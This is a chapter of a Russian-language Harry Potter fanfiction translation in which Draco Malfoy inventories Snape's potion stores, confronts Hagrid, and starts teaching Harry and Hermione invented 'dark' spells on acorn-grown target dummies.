Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 4

Сушеная вербена, измельченный корень дуба, толченые зубы змеи – бесчисленные ингредиенты выстроились на полках личного хранилища Снейпа, бережно рассортированные, и каждый из них был известен Драко. Северус полагал, что для восстановления сил выздоравливающих нет ничего лучше, чем многочасовое ознакомление с содержимым его лаборатории, категоризация, проверка свежести и обновление истершихся или потерявшихся ярлычков. Поначалу Драко попадались банки, подписанные разными почерками – свидетельства взысканий и отработок, в течение долгих лет назначавшихся особо невезучим студентам. Но чем более редкостным и опасным становилось содержимое - будь то куриные зубы, яд гадюки или ядовитая драконья печень - тем чаще надписи были сделаны рукой самого Снейпа.

На третий день инвентаризации Драко тихо сидел в кабинете Мастера зелий, скрытый шкафами, и рассматривал ингредиенты, о которых понятия не имели его коллеги. Может, Дамблдор что-то подозревал, но Министерству точно не было известно, что хранит в своем чулане Северус.

Несмотря на запрещенность, некоторые из них были довольно непримечательны – как вороньи перья, или просто чрезвычайно дороги – как глаза василиска, но вместе с паутиной, белладонной и клыками морских змей становилось ясно, что лаборатория и вся коллекция принадлежит темному магу.

Драко поднял бутыль без ярлычка и поднес к свече. Внутри бултыхнулось что-то красное, вязкое, но было трудно понять что именно, не открывая. Судя по нетронутому слою пыли на плотно притертой пробке, содержимое предохраняли от высыхания специальные чары. С другой стороны, очень немногие жидкости в зельях требовали особых предосторожностей, и потому Драко смело написал на ярлычке: «неизвестная кровь», приклеил его на бутыль и аккуратно поставил ее обратно на полку.

На стоящей рядом банке значилось: «болотные огни», но, взяв ее в руки, юноша обнаружил, что она пуста. Наверное, Северус использовал их совсем недавно, потому что в дырочках для воздуха застряли крохотные светящиеся частички.

Когда Драко закончил, его плечи немилосердно ныли, а голова просто раскалывалась. Но зато теперь он мог свободно сориентироваться меж рядами высоких полок и легко отыскать любой ингредиент, когда Северус пошлет его пополнить запасы лаборатории. Полезный навык, учитывая, чем им предстоит заниматься в последующие месяцы. Все это, конечно же, считалось привилегией ученика настоящего мастера.

Поглядев в окно, Драко увидел, что солнце еще не село. Так как он уже закончил все необходимые дела и устал от сидения взаперти, он быстро собрал рюкзак, захватил на всякий случай две пустые банки, черкнул записку и запер за собой кабинет.

Без остальных слизеринцев и их голосов, заполняющих коридоры, подземелья походили на пустой гроб. Но даже такую тишину Драко предпочитал студенческому ору, царящему наверху. Никто не спускался сюда, никто не беспокоил его. Поднимаясь, он предусмотрительно избегал оживленных коридоров, выбирая окольные пути и полузабытые скрытые проходы, замечая на их пыльном полу свои собственные следы. Не используемые даже домовиками тихие коридоры вели его мимо запертых дверей пустых комнат, за которыми раздавался глухой шелест и невнятное бормотание. Потрескавшиеся и потемневшие от времени картины на стенах ничуть не интересовали Драко.

Чем ближе он подходил к главному холлу, тем громче становился гул голосов, и вот, наконец, юноша остановился в дальнем углу, скрытый от любопытных глаз. Подняв капюшон теплой мантии, Драко снова безмолвно поблагодарил Северуса, который побеспокоился пополнить его гардероб. Жаль только, что вкус крестного в одежде был так же строг, как и он сам. Хотя он приобрел для Драко весьма дорогие мантии, они были скорее практичны, нежели элегантны. Юноша не привередничал, зная, что из этих двоих его отец обращает больше внимания на изысканность, но был немного раздосадован.

Дождавшись, когда студенты разойдутся, слизеринец быстро направился к дверям. Как только он вышел, ледяной ветер пробрал его до костей. Посланный Волдемортом буран прекратился уже на следующий день после прибытия Драко в замок, но выпавший снег не таял. Солнечный свет мерцал на покрывающей землю и деревья ледяной корке.

По протоптанной в снегу тропинке юноша вышел к озеру, где детские смех и вопли перемежались строгими окриками профессоров. Подойдя ближе, он увидел, как студенты беззаботно скользят по льду, а учителя наблюдают, сбившись в тесную группку. Казалось, ни тех, ни других, нисколько не заботит угроза нападения.

Ни на ком из катающихся не было знакомых зеленых шарфов, и сердце Драко предательски сжалось.

- Только попробуйте не вернуться, - шепнул он, обращаясь к отсутствующим друзьям. В ответ глухо взвыл ветер.

Отвернувшись от озера, слизеринец зашагал по нетронутому снегу к кромке леса. Найти на земле что-нибудь стоящее сейчас будет почти невозможно, но свежий воздух и солнце были приятным разнообразием по сравнению с кабинетным затворничеством и бесконечной сортировкой. К тому же здесь Драко мог позволить себе погрустить.

Все его друзья находились где-то посреди этой холодной белоснежной пустыни. Путешествие к Хогвартсу едва не стоило ему жизни, и он не хотел думать, что Пэнси и остальные могут оказаться не такими везучими. Отец пытается удержать контроль над группой оставивших Волдеморта Пожирателей, которые вовсе не обязательно будут более преданны ему в качестве рыцарей Вальпургии. И бог знает, где находится мать. Драко плотнее запахнул мантию и вздохнул.

- Глупый ребенок, как тебе удалось прожить достаточно долго, чтобы добраться сюда?

Драко вздрогнул но, узнав голос Снейпа, успел сдержать сердитую реплику. Приготовившись к отповеди, он повернулся к крестному.

– Нечего дуться, - заметил Мастер зелий. – Мне казалось, что полет сюда научил тебя осторожности. Очевидно, я ошибался, раз ты позволяешь себе так забываться среди бела дня.

- Прошу прощения, сэр, - отозвался Драко. – Мне пойти поиграть с кем-нибудь более бдительным?

Профессор хмыкнул и посмотрел на озеро, где студенты выписывали коленца, то и дело падая друг на друга.

- Директор убежден, что сейчас им как никогда необходимо отвлечься. Он полагается на охранные чары вокруг замковых земель, - Снейп снова посмотрел на крестника. – Но что ты здесь делаешь? Уже все закончил?

Скрестив руки на груди, Драко небрежно тряхнул головой, позволив капюшону соскользнуть вниз.

- Разумеется. А когда я понял, что мой наставник пребывает в дурном настроении, я, как и полагается хорошему ученику, решил прийти сюда и позволить ему выпустить пар на мне.

Северус несколько секунд молча смотрел на него, а затем покачал головой.

- Несносные Малфои, - фыркнул он, скорее с нежностью, чем с раздражением. Затем быстренько состроил свою привычную недовольную гримасу и повторил: - Почему ты здесь?

- Я все закончил и решил размять ноги. Мне все еще немного нехорошо, - Драко поглядел на лес, днем такой же неприветливый, как и ночью. – И… вряд ли Поттер станет тянуть с началом наших занятий. Если я не хочу стать его тренировочной мишенью, мне нужно найти что-то подходящее.

- Давно тебе не требовались мишени, верно? – задумчиво отозвался Мастер зелий. – Здесь неподалеку есть несколько дубов. Только не заходи далеко, - и ушел.

Драко кивнул и, обернувшись, смотрел, как он уверенно шагает по льду, как подбирает двух поскользнувшихся студентов, ставит их на ноги и идет дальше, не остановившись возле остальных профессоров.

Оставшись один, он медленно зашагал вдоль кромки леса, высматривая на деревьях желуди. Застигнутые бурей, мертвые листья держались на ветках только благодаря покрывающей все ледяной корке, но крепнущий ветер сбивал их наземь, словно в листопад.

Наконец, около тонкого молодого дубка Драко заметил несколько желудей. Нагнувшись, он разгреб снег и нашел на промерзшей земле еще несколько дюжин: большинство были почерневшими и съежившимися, но некоторые вполне годились. Собирая их, он время от времени засовывал замерзшие ладони в рукава зачарованной мантии, тихо досадуя на Северуса, забывшего добавить в его гардероб перчатки. Неподалеку от первого и чуть дальше в лес росла еще пара дубов, побольше, вокруг которых юноша обнаружил много целых и крепких желудей. К тому времени как Драко заполнил ими обе банки, солнце скрылось за горизонтом и в лесу сгустились тени.

- Чегой-то ты тут делашь?

Громовой голос напугал юношу, он быстро потянулся за палочкой и замер, обнаружив, что ему в лицо направлен заряженный арбалет, готовый выстрелить в любую секунду. Возвышавшийся над слизеринцем Хагрид настороженно поглядел сначала на Драко, а затем на лес позади него, словно ожидая увидеть там легион призванных им демонов.

- Я думал, тебе нельзя из замка, - обвиняюще заявил полугигант. – И неча те крутиться возле ребят.

Если бы не арбалет, направленный в лицо, Драко повернулся бы и убежал. Или метнул бы заклинание и потом  убежал. Чтобы свалить здоровяка понадобилось бы не одно заклинание. Юноша мысленно обругал себя: только что Северус отчитал его за беспечность и неосторожность - и на тебе, стоило крестному отойти, он снова замечтался! Насилу оторвав взгляд от кончика стрелы, грозящей сорваться с тетивы, Драко посмотрел на Хагрида, и как только их взгляды встретились, великан вздрогнул. Это едва заметное движение изменило все. Очень медленно и осторожно, стараясь не делать резких движений, Драко выпрямился и изобразил одну из своих самых дерзких ухмылок. В конце концов, отец всегда говорил, что его дерзость может быть грозным оружием, если ее правильно использовать. И, может, сейчас самое время обернуть все дикие слухи о темных магах себе на пользу.

- Я не пленник, а гость, - медленно, словно говоря с ребенком, сказал он. – И могу приходить и уходить, когда захочу.

Хагрид молча таращился на него, пока, наконец,  не произнес:

- Дамблдор говорил, ты не станешь вылазить с подземелий.

- Зная тебя, - презрительно заметил Драко, - я не удивляюсь, что ты ничего не понял. Давай объясню. Я оставаться в подземельях не чтоб запереть меня, а чтоб не тратить на вас мое время.

- Ты! - громыхнул Хагрид, - Мерзкий маленький…

- Темный маг, - перебил его Драко. – Тот, что крадет души и ест маггловских детишек на завтрак. Верно? – по тому, как напрягся лесничий, юноша понял, что тот не просто в курсе всех этих дурацких слухов, но и свято в них верит. Полугигант опустил арбалет, но держал его наготове, чтобы выстрелить при малейшей опасности.

- Не пойму, зачем Дамблдор пустил тя обратно, - мрачно буркнул он. – Вокруг и так полно заразы, чтоб еще ее в дом тащить.

«Он позволил мне остаться, потому что я нужен вам, потому что сейчас никто кроме меня не может вам помочь» - подумал Драко, но не стал упоминать их будущие занятия с Поттером, зная, что скажи он великану, к утру об этом будет знать вся школа.

- Что ж, если ты не намерен объяснять директору, почему пристрелил гостя на школьных землях, мне пора возвращаться, - холодно произнес он. Сделав пару шагов к замку, он обернулся, будто вспомнив о чем-то, и позвал: - Идем.

- Ну уж нет, - встрепенулся Хагрид.

Драко поднял капюшон, пряча улыбку.

- Я говорил не с тобой, - небрежно заметил он и вышел из-под сени деревьев, посмеиваясь над тем, как ошарашено озирался великан в поисках странных зверей и духов, следующих за слизеринцем. Но стоило ему отойти чуть дальше, он перестал смеяться и помрачнел.

- Тупой переросток, - сердито пробормотал он. – Такой же дурной, как его зверюги. Думает, я уже продал душу дьяволу. Представляю, что начнется, когда он узнает, чему я учу их драгоценного Поттера. Хотелось бы мне поглядеть на выражение его лица в тот момент. Грубый, недалекий дикарь.

Но этот дикарь пусть недолго, но держал жизнь Драко на кончике своей стрелы.  Юноша сердито стиснул кулаки и почувствовал себя еще хуже, когда не смог полностью сжать правую ладонь. Он темный маг, черт побери! Могущественный, умный, коварный, способный даже в горячке погони, раненый и смертельно уставший, прикончить пару Пожирателей! Вряд ли, конечно, он кому-то расскажет, что едва не проспал само нападение. Ну, разве что матери, если они когда-нибудь увидятся снова. Хотя, с другой стороны, она практически обо всем рассказывает отцу с Северусом, и Драко легко мог представить, как эти трое потешаются над ним, попивая чай.

- Вон он!

Застигнутый врасплох, Драко вздрогнул и тут же живо припомнил свои недавние кошмары о бешеной гонке по зимнему лесу. Готовый встретить разъяренную толпу, вооруженную камнями и палками, он увидел лишь Рона Уизли, указывающего на него с противоположного берега. Рядом стояли Поттер и Грейнджер. Драко облегченно вздохнул.

- Все, - пробормотал он, глядя на приближающихся гриффиндорцев. – Больше никаких раздумий и мечтаний вне подземелий. Слишком опасно, - и плотнее запахнул мантию, словно она могла его от чего-то защитить. Почему вдруг его кошмары стали такими частыми и отчетливыми? Надо будет спросить Северуса.

Когда троица приблизилась, плавно скользя по льду, сердце Драко уже не стучало как сумасшедшее, и он высокомерно взглянул на них. Гарри неуклюже затормозил и не упал только потому, что друзья успели его подхватить.

- Никогда раньше не катался, Поттер? – хмыкнул Драко.

- Где ты был? – требовательно спросил тот. – Снейп мне не говорит, а Дамблдор настаивает, чтобы мы поскорей начинали заниматься.

- Уже? Трех дней не прошло, - заметил Драко.

- Прошло пять. Первые два ты проспал, - неумолимо сообщила Грейнджер. – А на счету каждая минута. Напасть могут когда угодно.

- Так вот почему вы наслаждаетесь свежим воздухом, - сухо прокомментировал Драко.

- Хватит вилять, Малфой, - предупреждающе заявил Уизли. – Ты закончил прятаться в подземельях?

- Я не закончу, Уизли, потому что помогаю готовить зелья, для вас же, - пояснил Драко. – А что до занятий… полагаю, Снейп не будет возражать, если я начну прямо сейчас. Пойдемте в замок, - и он не спеша зашагал по берегу. Гриффиндорцы покатились рядом.

- Ой, ну же, - не выдержал Уизли. – Каждый знает, как зачаровать обувь, чтоб она скользила. Я не хочу конечности отморозить, пока ты будешь обходить все озеро.

- А тебе и не нужно, - равнодушно заметил Драко. – Мне велено заниматься только с Поттером. Если, конечно, тебя не интересует темная магия, Уизли. Как думаешь, твой отец это одобрит? Хотя, учитывая, сколько вас, родители вряд ли заметят разницу, если от одного придется отречься.

- Ты, мерзкий… - ринулся к нему Рон, но в этот момент Поттер ухватился за него, чтобы не упасть.

- Не нужно,  - посоветовал Гарри, вихляя из стороны в сторону. – Он не стоит того, чтобы ввязываться в неприятности.

- Не уверен, - сердито буркнул Уизли, слегка присмирев.

Остальные студенты давно вернулись в замок. Солнце опустилось за горизонт и наступила тишина. На темнеющем бархате неба появились первые яркие звезды и тени удлинились, заставив гриффиндорцев занервничать и ускорить шаг. Пока те настороженно оглядывались, Драко старался не показывать собственную нервозность. Когда они приблизились к дверям замка, он слегка отстал от спутников и оглянулся. Деревья и поверхность озера серебрились в лунном свете, резкий ветер зло жалил лицо. На мир опустилась морозная ночь, и Драко от всего сердца понадеялся, что его друзей где-то посреди ледяной пустыни согревает не только зачарованная одежда.

Тихий гомон голосов вернул его к настоящему, и он вошел в главный холл замка, где остальные студенты как раз снимали перчатки и стряхивали снег с мантий. Все как один уставились на него и зашептались. Он абсолютно точно знал, на кого похож в этот момент, стоя в дверях в черной долгополой мантии с поднятым капюшоном, скрывающим лицо. Знал, что каждый из них видел на картинках в своих детских книжках, знал, что сейчас он как никогда походит на изображение одного из тех самых темных магов, которые приходят в дома по ночам, погружают семьи в зачарованный сон и крадут младенцев из колыбелей.

Их страх заставил его улыбнуться, но небывало живая память о бешеной толпе из снов быстро стерла улыбку.

- Сюда, - сказал он Поттеру, направляясь в боковой коридор.

- Притормози, - попытался встрять Уизли, но Драко резко оборвал его:

- Никаких наблюдателей, - и едва слышно, чтобы только эти трое могли слышать, прошептал. – Если ты не собираешься участвовать.

Гермиона заинтересованно шагнула ближе, но сдавленный окрик Уизли остановил ее. Чуть заметно улыбнувшись, Драко повернулся и ушел. Он знал, даже не оглядываясь, что Поттер следует за ним. В тишине шаги были хорошо слышны.

Только отойдя на безопасное расстояние от главного холла, Драко глубоко вздохнул, откинул капюшон и позволил себе расслабиться. Как он тосковал по Винсу, Грегу и Пэнси в этот момент! Драко отчаянно нуждался в своих друзьях.

- Почему они это делают? – полюбопытствовал нагнавший его Поттер.

- Таращатся на меня как на дикого зверя, ты имеешь в виду? – сухо уточнил слизеринец. – Ты что, в детстве сказок не читал?

- Вообще-то нет, - медленно ответил Поттер. – Так, несколько историй в начальной школе. А что?

- Не знаю, что за маггловский бред ты читал, но в волшебных историях обычно говорится об отважном светлом герое, убивающем темных магов и спасающем детей и прекрасных девушек, - притворно-легкомысленно начал объяснять Драко. – И о нас, бездушных монстрах, живущих в темных пещерах вдали от солнечного света. Но когда восходит луна, мы покидаем наши убежища и пожираем несчастных заблудших путников. Темных магов всегда можно узнать по длинным черным мантиям с низко надвинутыми капюшонами – они больше походят на тени, чем на людей. Колдуны всего лишь ловят путников и едят их, а вот ведьмам повезло больше – они до беспамятства загоняют скот и лошадей и не гнушаются получать удовольствие со спящими мужчинами, - Драко взглянул на Поттера, чтобы убедиться, что тот слушает. –  Обязательно посмотри книжки с картинками – очень познавательно.

Гарри ничего не ответил, и Драко повел его дальше по пустынным коридорам, мимо почерневших портретов. Наконец Поттер спросил:

- Хоть что-нибудь из этого правда?

- Даже в самой гнусной лжи есть крупица правды, - произнес слизеринец, вспомнив ход из кабинета отца в тщательно спрятанную пещеру. Он ни секунды не сомневался, что задолго до появления особняка его предки жили в том, самом первом укрытии. – Я не читал «Пророк» после того, как добрался сюда, но, думаю, все уже знают кто я. Естественно, они будут пялиться.

- Может, им просто любопытно. Особенно после известия, что ваше поместье уничтожено, - произнес Поттер. – В «Пророке» сообщили не так уж много. Дамблдор тоже ничего не рассказывал, так что наверняка о случившемся никому неизвестно.

Резкое эхо шагов позади заставило юношей обернуться. Запыхавшаяся Грейнджер поравнялась с ними и остановилась, пытаясь отдышаться. Поттер удивленно улыбнулся – он явно был рад подруге. Драко скривился.

- Что ты здесь делаешь? – холодно поинтересовался он. – Я предупреждал…

- Чтобы мы не ходили следом, если не хотим участвовать, - упрямо заявила девушка. – А я хочу.

- Гермиона… - начал Гарри.

- Я не оставлю тебя одного с ним, - перебила та. – И потом, я хочу это видеть.

- А что насчет Уизли? – скептически поинтересовался Драко. – Он не горел желанием тебя отпускать.

- С ним я потом разберусь, - отрезала Грейнджер. – Ну, мы будем что-нибудь делать, или ты собираешься стоять и спорить всю ночь?

Вместо ответа Драко повернулся и повел гриффиндорцев по лабиринту коридоров, пока они не достигли подземелий.  Он невольно прислушивался, как Грейнджер рассказывает Поттеру о привычке замка менять интерьер, о том, как классы, комнаты и коридоры теряются и находятся вновь годы спустя.

- Вообще-то, - вдохновенно вещала девушка, - многие портреты признаются, что понятия не имеют, где их собственные холсты. Однажды они отправились в гости, замок изменился и они потерялись.

- И где они теперь находятся? – удивился Гарри.

- Там, где им нравится, я думаю. Большинство картин, где проходят вечеринки, сначала были просто пейзажами, - ответила Грейнджер, поглядев на почерневшие холсты и поежившись от вида потрескавшихся, неровных, пустых поверхностей. – Полагаю, они не вернулись бы, даже если бы и знали, куда.

- Просто не хотят уходить с вечеринок, - заметил Драко, поворачивая в извилистый проход. – В конце концов, этот коридор непосредственно сообщается с главным холлом. Так что неизвестно, на самом ли деле они потерялись, или же просто никто не хочет признавать, что эта часть замка существует. А, Грейнджер?

- Что? Конечно же, она существует, - раздраженно отозвалась та. – Мы в ней находимся!

- Да, но это вроде Дрянн-аллеи, - ехидно усмехнулся Драко. – Все знают, где она, но никому не нравится о ней говорить.

Только девушка открыла рот, чтобы ответить, Гарри перебил ее:

- Нам незачем о ней говорить. Ничего хорошего там нет, только мерзкие ведьмы продают человеческие ногти, зубы и прочие гадости.

- Ногти, - принялся объяснять Драко, - если их правильно обработать, используются при лечении кожных заболеваний. Человеческие зубы, особенно клыки и резцы - превосходны для изготовления защитных амулетов.

- Правда? – ядовито переспросила Грейнджер. – Что-то я не встречала упоминаний об этом в учебниках ни по Зельям, ни по Чарам.

- Это потому, что, имея твой ноготь, я также могу создать куклу, которая высосет из тебя всю жизненную силу, - улыбнувшись, пояснил Драко. – А с помощью зубов… короче говоря, если они попадут не в те руки, от жертвы мало что останется.

Гриффиндорцы поморщились и промолчали.

Вместо того чтобы вести их в гостиную Слизерина, Драко выбрал пустующий класс неподалеку. Сломанные парты были отодвинуты к дальней стене, а на пыльной доске все еще виднелся полустертый рецепт забытого зелья. Открыв одну из наполненных в лесу банок, он вытряхнул на ладонь несколько желудей и осторожно выложил их на пол, чуть поодаль друг от друга.

- Первое, что вы должны усвоить, - произнес он, раскладывая крошечные плоды, - что темные заклинания сильно отличаются от тех, к которым вы привыкли. 

- Дамблдор сказал, что они словно тени, - сказал Гарри. – И что на них уходит много энергии.

- Да, они отнимают много сил, - подтвердил Драко. – Я был таким уставшим, когда прилетел, именно потому что по пути мне пришлось использовать несколько заклятий.

- Чтобы избавиться от погони? – спросила Грейнджер.

Драко вспомнилось разбитое лицо Пожирательницы перед тем, как он убил ее.

- Не совсем. Темные заклятья похожи на тени потому, что ими очень трудно управлять. Лучший способ понять их - попробовать представить темную магию в виде мифической гидры. Отсеки голову, и вместо одной вырастут две, сделав ее сильнее.

Отойдя от гриффиндорцев, он направил палочку на ближайший желудь и шепнул:

- Risana, -  с кончика палочки устремилась грязно-зеленая вспышка. Желудь словно вспух, из него поползли узловатые побеги, которые мгновенно переплелись между собой, потянулись вверх и скрутились в корявый ствол с неровным шаром на верхушке.

Вздохнув, слизеринец скептически оглядел свое творение. Прошло много лет с тех пор, как ему последний раз требовалась мишень, и эта получилась слегка кособокой. К его удивлению, на темно-коричневой поверхности даже появилась пара зеленых листиков – яркое пятно в серости кабинета.

- Чтобы тренироваться, вам понадобятся мишени, так что сначала выучите это заклинание, - обратился Драко к Поттеру. – Всю остальную домашнюю работу придется отложить на пару недель.

- На пару недель? – ошеломленно переспросил тот. – Ты думаешь, я стану тратить время, чтобы научиться превращать желуди в деревья? Какая чушь!

- Не в том суть. По-твоему оно похоже на дерево?

- Оно похоже на тонкий пучок перепутанных веток, - скептически ответила Грейнджер. -  Что ты сделал? Это не обычное заклинание.

- Естественно, нет. Вас не учат такой магии, - Драко аккуратно снял мантию, положил ее на ближайшее кресло и облокотился на стол. – В известных вам заклинаниях за основу взята латынь. Если в формулировке что-то нужно поменять, вы просто добавляете новое слово.

- Как «мобилиарбус» и «мобиликорпус», - нетерпеливо кивнула Грейнджер, не заметив предупреждающего взгляда Поттера. Драко быстро взглянул на нее:

 - Когда это тебе довелось левитировать тело?

- Неважно, - встрял Поттер. – Это была безумная авантюра, принесшая Гриффиндору очередную тысячу баллов.

- Угу… - протянул совершенно неубежденный Драко. – Ладно. Примерно так работает известная вам магия. Наша же основывается исключительно на намерении. Мне не нужно добавлять слова, достаточно знать, что должно произойти. «Ризана» - значит «расти», но в зависимости от того, что именно мне нужно, я могу заставить этот желудь просто расти, как сейчас, могу с его помощью раскрошить камень в пыль.  А если я дерусь с кем-то, могу тем же заклинанием вскипятить кровь противника.  

 Грейнджер зажмурилась от отвращения, представив, как это могло бы выглядеть, и крепче вцепилась в лацканы пальто.

- То есть… поднять температуру тела? – уточнила она.

- Именно.

- Совсем не похоже на наши чары, - кивнула девушка. – Я могу превратить человека в животное, но не могу изменить его суть.

- Как это? – непонимающе нахмурился Поттер. – Гермиона? Что значит «изменить суть»?

- Превращая ежа в подушечку для иголок, - не дал ей ответить Драко, - вы, фактически, придаете ему другую форму. Например, если Грейнджер сейчас превратит тебя во льва, даже с когтями и зубами ты по-прежнему останешься Поттером. Но я, темный маг, колдуя, меняю саму природу вещи. Если я превращу тебя во льва, ты станешь Котом-который-выжил, забудешь, кем ты был прежде, и не побрезгуешь закусить собственными друзьями.

- Как оборотни, Гарри, - поддакнула Грейнджер. – Весь месяц они совершенно нормальны, но в полнолуние, когда темная магия берет верх, они забывают себя, забывают, кто они, совершенно.

- Вот почему темная магия отнимает столько сил, - объяснил Драко. – Если бы я действительно решил заколдовать тебя, то после провалялся бы без сознания несколько дней, - он кивнул на то, что было желудем. – Я думаю, понадобится пара недель тренировок, прежде чем ты сможешь наколдовать мишень и у тебя останутся силы на что-то еще.

Несколько секунд Гарри молча смотрел на Драко. Слизеринец явно помнил его предупреждение, потому что еще никогда не давал себе труда так долго удерживаться от оскорблений в адрес «грязнокровки» или «Уизела». Кроме того, сейчас он вел себя намного спокойнее, чем когда бы то ни было. Еще не дружелюбно, нет, но без нападок и оскорблений поведение Драко казалось почти приемлемым. И именно это так тревожило Гарри. Как бы он ни радовался, что их занятия, вопреки его опасениям, не превратятся в пытку, такая неожиданная перемена в поведении Малфоя настораживала.

- Если не верите, - произнес Драко, отнеся сомнения Гарри на счет заклинания, - попробуйте сами. Направьте палочку на желудь и пожелайте, чтобы появились побеги.

Грейнджер помедлила, заколебавшись, а Поттер поднял палочку:  

- Risana, - цвет его заклинания оказался бледнее, чем у слизеринца. Когда вспышка достигла желудя, тот выпустил несколько слабеньких побегов, сделавшись похожим на кособокого паучка. Удивленный Драко довольно кивнул:

- Для начала неплохо. Что-нибудь почувствовал, когда колдовал?

Гарри настороженно покосился на Малфоя, но тот казался искренне заинтересованным.

- Не знаю,- нерешительно ответил он. – Что-то определенно было по-другому. Словно заклинание было… тяжелее. Я почти ощущал его вес.

Это немедленно напомнило Драко о том, что совершенно вылетело у него из головы.

- Точно, вес… черт подери,  -  устало вздохнул он и закрыл глаза.

- Что такое? – немедленно насторожилась Грейнджер.

Слизеринцу едва удалось сдержать нервный смешок – как объяснить, что ты забыл нечто, едва не стоившее тебе жизни пару дней назад? Он жил под угрозой, что темная магия выест его изнутри, с тех пор, как достаточно подрос, чтобы держать палочку. Игра со смертью, хоть и пугающая, для Драко была привычной частью жизни.

- Это как-то связано с тем, что произошло раньше, – догадался Гарри, – когда я помог тебе добраться до гостиной.  

- Тот вес, который ты почувствовал, когда колдовал, - кивнул Драко, - от него надо избавляться каждый вечер, иначе он поглотит тебя. Это цена, которую мы платим за мощь нашей магии.

- Слишком высокая цена за ошибку, - настороженно заметил Поттер. – Стоит ли оно того?

- Конечно, стоит! – сердито рявкнул Драко. – Ты не поймешь, пока не начнешь колдовать по-настоящему. Темная магия приносит намного больше удовлетворения, она гораздо богаче, она более… - он постарался подобрать подходящее слово, но тщетно. – Мне было так больно только потому, что я пробудил мощные, древние семейные заклятья, да еще и волшебная буря Волдеморта преследовала меня всю дорогу. Я не мог остановиться и принять ванну в снегу.

- Так как от этого избавляться? – Грейнджер вернула их к непосредственной задаче. – Просто принять ванну?

- Вода необходима, да, - вздохнул Драко, приказав себе успокоиться. – Но есть еще ритуал и… что-то вроде молитвы, - юноша закрыл глаза и провел рукой по волосам, жестоко коря себя.

Дурак! Как он мог забыть, что вместе с магией ему придется научить этих неблагодарных глупцов еще и семейному ритуалу?! Волдеморт не сумел убить его, но отец точно прикончит.

- Так, - заговорил он снова, пока они не велели ему поторапливаться. – Я знаю, что вы серьезно недолюбливаете темную магию, но, клянусь, если вы кому-нибудь расскажете о заклинании, которому я вас сейчас научу, можете забыть о наших занятиях. Никаких больше уроков, и плевал я на войну. У каждой чистокровной семьи свой ритуал, и мы никому не рассказываем, какой именно.

Грейнджер задумалась и, в конце концов, кивнула. Дождавшись кивка Поттера, Драко произнес заклинание целиком, а затем повторил несколько раз, медленно и тщательно выговаривая древние слова, пока гриффиндорцы не смогли повторить их без запинки.  Непривыкшие к такому языку, они запинались на каждом слове, но Драко упрямо отказывался объяснить, что слова означают. Когда же они освоили резкие согласные и напевный ритм, юноша удовлетворенно махнул рукой:

- Достаточно, - и зевнул. Подтолкнув две банки с желудями к гриффиндорцам, он добавил: - Вот, можете практиковаться на них. Не возвращайтесь, пока не научитесь наколдовывать нечто, похожее на ребенка.

- Ребенка? – тут же недовольно отозвалась Грейнджер. – Малфой, неужели нельзя пропустить это заклинание? У нас нет времени на глупости… - но Драко оборвал ее, усмехнувшись.

- Пропустить? Пожалуйста! Будете практиковаться друг на друге и надеяться, что ваши защитные заклятья окажутся достаточно сильными. Хочешь что-нибудь другое для начала? – он стремительно направил палочку на кривобокую мишень: - Haetus heorte!

Место, где у создания должно было находиться сердце, вспыхнуло, и мгновение спустя там красовалась аккуратно выжженная дыра размером с кулак, сквозь которую можно было разглядеть противоположную стену.  Не успел дым рассеяться, Драко метнул следующее заклятье – crepara. Переплетенные ветви мгновенно высохли, съежились и рассыпались в пыль. Обернувшись к гриффиндорцам, он не удивился, увидев на их лицах отвращение – они наверняка представили, как все это выглядело бы на живом человеке.

- Что… - первой опомнилась всезнайка, - что это было? Я никогда не слышала ничего подобного. Это не латынь…

- Верно, не латынь, - ответил Драко, не скрывая удовлетворения. –  Ваша ветвь магии происходит от римских захватчиков, мы же почти не пользуемся их языком, большинство наших заклятий берет начало в древних наречиях этой страны.  Что до самих заклятий… с ними разберемся потом. Ну что, все еще хотите пропустить ризану?

Поттер молча глядел на уничтоженную мишень. Грейнджер схватила банку с желудями и завернула ее в пальто.

- Я лучше пойду, - поспешно сказала она. – Рон думает, что я в библиотеке, доделываю домашнее задание, - она задержалась у двери, поджидая Поттера, но тот даже не шевельнулся, и она ушла одна. Ее шаги быстро стихли.

Драко обернулся к неподвижно стоящему гриффиндорцу.

- Кажется, Грейнджер не понравилась темная магия. Думаешь, я ее напугал?

- Ты уже использовал их раньше, - невпопад произнес тот, уставившись на Малфоя, словно видя его впервые.

- Естественно, -  Драко посмотрел на него, но быстро отвел глаза. Почему у Поттера такой пронзительный взгляд? Безжалостный, как у Темного лорда. – Я высушил вены одного из Пожирателей, когда добирался сюда.

- А все остальные?  

- Нет. Тогда мне пришлось применить другое заклятье, но из пучка веток сложно выжать даже каплю крови, так что сейчас пришлось показать нечто более наглядное, - Драко старался не морщиться, гадая про себя, что могло случиться с Поттером за лето, отчего его взгляд стал таким невыносимым. Или он только сейчас это заметил?

- Почему ты не воспользовался ими раньше? – спросил Поттер. – Ты столько лет хотел навредить мне, даже убить. Почему нет?

«Потому что тогда отец точно прикончил бы меня» - подумал Драко, но ничего не сказал. Гриффиндорцу незачем знать, насколько он ценит мнение Люциуса. Узнай об этом остальные, над ним станут глумиться до конца жизни.

- Одно-единственное темное заклятье может погубить всю мою семью, - негромко произнес он. К его удивлению, Поттер не стал спорить.

- Ты прятал свои клыки, - понимающе кивнул гриффиндорец, - Дамблдор так и сказал.

- Не совсем клыки, но, в общем, верно. Студентов трогать нельзя.

- Что значит «не совсем клыки»? – шагнул к нему Поттер, и Драко заметил, что он все еще сжимает в кулаке палочку. – Малфои никогда ничего не говорят просто так.

Приближение гриффиндорца заставило Драко занервничать, но он не дрогнул.

- А еще Малфои умеют хранить семейные тайны. Ты закончил допрос? Тебе пора тренироваться с заклинанием.

Поттер поглядел на него еще несколько секунд, забрал вторую банку с желудями и ушел. Несколько секунд Драко слушал эхо его шагов, пока, наконец, в опустевшем классе не наступила тишина. Собрав оставшиеся желуди, он избавился от неудачной попытки Гарри создать мишень, заметив, каким громким кажется шелест мантии в окружающем безмолвии, и вышел.

